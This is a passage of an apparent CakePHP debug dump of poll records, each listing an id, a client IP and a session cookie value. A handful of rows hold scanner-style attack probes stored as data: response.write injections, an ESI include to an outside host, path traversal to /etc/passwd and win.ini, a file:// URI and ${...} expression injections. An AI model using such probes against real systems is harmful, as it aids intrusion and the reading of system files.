'sondage_id' => '2'
),
(int) 5631 => array(
'id' => '6174',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5632 => array(
'id' => '6175',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5633 => array(
'id' => '6176',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5634 => array(
'id' => '6177',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5635 => array(
'id' => '6178',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5636 => array(
'id' => '6179',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5637 => array(
'id' => '6180',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5638 => array(
'id' => '6181',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5639 => array(
'id' => '6182',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5640 => array(
'id' => '6183',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5641 => array(
'id' => '6184',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5642 => array(
'id' => '6185',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5643 => array(
'id' => '6186',
'ip' => '85.190.233.47',
'ip1' => 'response.write(9952038*9805639)',
'sondage_id' => '2'
),
(int) 5644 => array(
'id' => '6187',
'ip' => '85.190.233.47',
'ip1' => '',
'sondage_id' => '2'
),
(int) 5645 => array(
'id' => '6188',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5646 => array(
'id' => '6189',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5647 => array(
'id' => '6190',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5648 => array(
'id' => '6191',
'ip' => '85.190.233.47',
'ip1' => ''+response.write(9952038*9805639)+'',
'sondage_id' => '2'
),
(int) 5649 => array(
'id' => '6192',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5650 => array(
'id' => '6193',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5651 => array(
'id' => '6194',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5652 => array(
'id' => '6195',
'ip' => '85.190.233.47',
'ip1' => '"+response.write(9952038*9805639)+"',
'sondage_id' => '2'
),
(int) 5653 => array(
'id' => '6196',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5654 => array(
'id' => '6197',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5655 => array(
'id' => '6198',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5656 => array(
'id' => '6199',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5657 => array(
'id' => '6200',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5658 => array(
'id' => '6201',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5659 => array(
'id' => '6202',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5660 => array(
'id' => '6203',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5661 => array(
'id' => '6204',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5662 => array(
'id' => '6205',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5663 => array(
'id' => '6206',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5664 => array(
'id' => '6207',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5665 => array(
'id' => '6208',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5666 => array(
'id' => '6209',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5667 => array(
'id' => '6210',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5668 => array(
'id' => '6211',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5669 => array(
'id' => '6212',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5670 => array(
'id' => '6213',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5671 => array(
'id' => '6214',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5672 => array(
'id' => '6215',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5673 => array(
'id' => '6216',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5674 => array(
'id' => '6217',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5675 => array(
'id' => '6218',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5676 => array(
'id' => '6219',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5677 => array(
'id' => '6220',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5678 => array(
'id' => '6221',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5679 => array(
'id' => '6222',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5680 => array(
'id' => '6223',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5681 => array(
'id' => '6224',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5682 => array(
'id' => '6225',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5683 => array(
'id' => '6226',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5684 => array(
'id' => '6227',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5685 => array(
'id' => '6228',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5686 => array(
'id' => '6229',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5687 => array(
'id' => '6230',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5688 => array(
'id' => '6231',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5689 => array(
'id' => '6232',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5690 => array(
'id' => '6233',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5691 => array(
'id' => '6234',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5692 => array(
'id' => '6235',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5693 => array(
'id' => '6236',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5694 => array(
'id' => '6237',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5695 => array(
'id' => '6238',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5696 => array(
'id' => '6239',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5697 => array(
'id' => '6240',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5698 => array(
'id' => '6241',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5699 => array(
'id' => '6242',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5700 => array(
'id' => '6243',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5701 => array(
'id' => '6244',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5702 => array(
'id' => '6245',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5703 => array(
'id' => '6246',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 5704 => array(
'id' => '6247',
'ip' => '85.190.233.47',
'ip1' => 'RDdFTWdoUGNFTkVZYU1RVG96b1RtUFp3R0ZOWTdZZjFkeGxWV1Izag==',
'sondage_id' => '2'
),
(int) 5705 => array(
'id' => '6248',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5706 => array(
'id' => '6249',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5707 => array(
'id' => '6250',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5708 => array(
'id' => '6251',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5709 => array(
'id' => '6252',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5710 => array(
'id' => '6253',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5711 => array(
'id' => '6254',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5712 => array(
'id' => '6255',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5713 => array(
'id' => '6256',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5714 => array(
'id' => '6257',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5715 => array(
'id' => '6258',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5716 => array(
'id' => '6259',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5717 => array(
'id' => '6260',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5718 => array(
'id' => '6261',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5719 => array(
'id' => '6262',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5720 => array(
'id' => '6263',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5721 => array(
'id' => '6264',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5722 => array(
'id' => '6265',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5723 => array(
'id' => '6266',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5724 => array(
'id' => '6267',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5725 => array(
'id' => '6268',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5726 => array(
'id' => '6269',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5727 => array(
'id' => '6270',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5728 => array(
'id' => '6271',
'ip' => 'file:///etc/passwd',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5729 => array(
'id' => '6272',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5730 => array(
'id' => '6273',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5731 => array(
'id' => '6274',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5732 => array(
'id' => '6275',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5733 => array(
'id' => '6276',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5734 => array(
'id' => '6277',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5735 => array(
'id' => '6278',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5736 => array(
'id' => '6279',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5737 => array(
'id' => '6280',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5738 => array(
'id' => '6281',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5739 => array(
'id' => '6282',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5740 => array(
'id' => '6283',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5741 => array(
'id' => '6284',
'ip' => '../85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5742 => array(
'id' => '6285',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5743 => array(
'id' => '6286',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5744 => array(
'id' => '6287',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5745 => array(
'id' => '6288',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5746 => array(
'id' => '6289',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5747 => array(
'id' => '6290',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5748 => array(
'id' => '6291',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5749 => array(
'id' => '6292',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 5750 => array(
'id' => '6293',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5751 => array(
'id' => '6294',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5752 => array(
'id' => '6295',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5753 => array(
'id' => '6296',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5754 => array(
'id' => '6297',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5755 => array(
'id' => '6298',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 5756 => array(
'id' => '6299',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5757 => array(
'id' => '6300',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5758 => array(
'id' => '6301',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5759 => array(
'id' => '6302',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5760 => array(
'id' => '6303',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5761 => array(
'id' => '6304',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5762 => array(
'id' => '6305',
'ip' => '85.190.233.47',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 5763 => array(
'id' => '6306',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5764 => array(
'id' => '6307',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5765 => array(
'id' => '6308',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5766 => array(
'id' => '6309',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5767 => array(
'id' => '6310',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5768 => array(
'id' => '6311',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5769 => array(
'id' => '6312',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5770 => array(
'id' => '6313',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5771 => array(
'id' => '6314',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5772 => array(
'id' => '6315',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5773 => array(
'id' => '6316',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5774 => array(
'id' => '6317',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5775 => array(
'id' => '6318',
'ip' => '85.190.233.47',
'ip1' => '../CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5776 => array(
'id' => '6319',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5777 => array(
'id' => '6320',
'ip' => '${9999718+9999488}',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5778 => array(
'id' => '6321',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5779 => array(
'id' => '6322',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5780 => array(
'id' => '6323',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5781 => array(
'id' => '6324',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5782 => array(
'id' => '6325',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5783 => array(
'id' => '6326',
'ip' => '85.190.233.47',
'ip1' => '${10000297+9999135}',
'sondage_id' => '2'
),
(int) 5784 => array(
'id' => '6327',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5785 => array(
'id' => '6328',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5786 => array(
'id' => '6329',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5787 => array(
'id' => '6330',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5788 => array(
'id' => '6331',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5789 => array(
'id' => '6332',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5790 => array(
'id' => '6333',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5791 => array(
'id' => '6334',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5792 => array(
'id' => '6335',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5793 => array(
'id' => '6336',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5794 => array(
'id' => '6337',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5795 => array(
'id' => '6338',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5796 => array(
'id' => '6339',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5797 => array(
'id' => '6340',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5798 => array(
'id' => '6341',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5799 => array(
'id' => '6342',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5800 => array(
'id' => '6343',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5801 => array(
'id' => '6344',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5802 => array(
